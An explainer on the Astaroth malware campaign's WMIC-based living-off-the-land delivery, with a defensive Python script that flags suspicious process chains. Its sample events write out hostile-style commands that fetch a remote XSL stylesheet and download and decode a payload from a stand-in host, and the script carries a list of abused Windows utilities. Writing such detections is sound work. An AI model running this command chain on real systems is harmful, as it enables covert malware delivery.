Microsoft has uncovered a sophisticated new spam campaign pushing the information-stealing malware Astaroth. To evade anti-malware products, the Astaroth Trojan is not attached to the spam messages directly; it is delivered through malicious scripts that abuse legitimate, pre-installed Windows utilities, a tactic known as living off the land.
The spam emails contain a link to a URL hosting a .LNK shortcut file. Opening the shortcut launches the Windows Management Instrumentation Command-line tool (WMIC), which in turn launches further built-in Windows tools; one of these eventually downloads Astaroth onto the targeted device. Because each stage is a legitimate Windows binary, the malicious activity is visible in command-line arguments and parent-child process relationships rather than in any file signature.
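As an added illustration (example code written for this page, not from Microsoft's report or the original article), the following script shows how a detection engineer would hunt for this kind of chain in process-creation telemetry. It assumes records shaped like Sysmon Event ID 1 or Windows 4688 (pid, parent pid, image name, command line) and flags two things: WMIC invoked with its documented /format switch pointing at a remote URL (WMIC will fetch and execute the referenced XSL stylesheet), and any commonly abused Windows utility whose ancestor chain contains wmic.exe. The list of utilities and the sample events are constructed for the example; the article itself only says "other Windows tools".

```python
"""Hunt for a WMIC-based living-off-the-land chain in process-creation events.

Added example. Events and the LOLBIN list below are constructed assumptions,
not data from the Astaroth report.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    """One process-creation record (Sysmon Event ID 1 / Windows 4688 style)."""
    pid: int
    ppid: int
    image: str      # executable file name, lower-case
    cmdline: str


# Windows utilities frequently abused after WMIC in living-off-the-land chains.
# Assumed list for this example (the article does not name the tools).
LOLBINS = {
    "bitsadmin.exe", "certutil.exe", "regsvr32.exe", "mshta.exe",
    "rundll32.exe", "powershell.exe", "cscript.exe", "wscript.exe",
}

# WMIC's /format switch takes an XSL stylesheet; a URL there means WMIC
# downloads and runs remote script content.
REMOTE_XSL = re.compile(r'/format:"?\s*https?://', re.IGNORECASE)


def ancestors(pid, by_pid):
    """Yield the image names of a process's ancestors, nearest parent first."""
    seen = set()
    ev = by_pid.get(pid)
    while ev is not None and ev.ppid in by_pid and ev.ppid not in seen:
        seen.add(ev.ppid)          # guard against cycles in bad telemetry
        ev = by_pid[ev.ppid]
        yield ev.image


def detect(events):
    """Return (rule, pid) alerts for suspicious WMIC activity in the events."""
    by_pid = {e.pid: e for e in events}
    alerts = []
    for e in events:
        # Rule 1: WMIC pulling its output stylesheet from the network.
        if e.image == "wmic.exe" and REMOTE_XSL.search(e.cmdline):
            alerts.append(("wmic_remote_xsl", e.pid))
        # Rule 2: a living-off-the-land binary running underneath WMIC.
        if e.image in LOLBINS and "wmic.exe" in set(ancestors(e.pid, by_pid)):
            alerts.append(("lolbin_under_wmic", e.pid))
    return alerts


# Constructed sample: a shortcut opened from Explorer starts WMIC with a remote
# stylesheet, which then spawns a downloader and a decoder. The last two events
# are benign look-alikes that must not fire.
SAMPLE_EVENTS = [
    ProcEvent(100, 1, "explorer.exe", "C:\\Windows\\explorer.exe"),
    ProcEvent(200, 100, "wmic.exe",
              'wmic os get /format:"https://example.invalid/p.xsl"'),
    ProcEvent(300, 200, "bitsadmin.exe",
              "bitsadmin /transfer j https://example.invalid/a.txt "
              "C:\\Users\\Public\\a.txt"),
    ProcEvent(400, 200, "certutil.exe",
              "certutil -decode C:\\Users\\Public\\a.txt C:\\Users\\Public\\a.dll"),
    ProcEvent(500, 100, "wmic.exe", "wmic os get caption"),
    ProcEvent(600, 1, "certutil.exe", "certutil -verify C:\\tmp\\cert.cer"),
]


if __name__ == "__main__":
    for rule, pid in detect(SAMPLE_EVENTS):
        print(f"{rule}: pid {pid}")
```

The two rules are deliberately independent: the remote-stylesheet check fires on the WMIC command line alone, while the ancestry check catches the follow-on tools even if the initial WMIC invocation was not logged with its arguments. In a real deployment both would be tuned against the environment's baseline, since administrators do use WMIC and certutil legitimately.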
Living-off-the-land attacks are often grouped with fileless attacks (the two overlap but are not identical: the former abuse trusted pre-installed tools, the latter avoid writing a malicious executable to disk) and are increasingly popular among threat actors because they are harder to detect. A file-based scanner sees only legitimate system binaries, so defenders have to rely on behavioural telemetry such as process trees and command-line arguments.